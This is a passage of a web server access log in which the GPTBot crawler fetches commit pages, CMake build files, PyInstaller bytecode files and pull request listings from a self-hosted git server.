+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" -[17/Feb/2026:16:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fappsettings.json" [Client 74.7.227.38] [Length 21433] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:16:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:16:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:16:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29832] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11212] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29832] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:16:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29832] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:16:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:16:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11846] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11210] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11896] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11818] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29832] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11187] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11214] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11216] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29834] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11862] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 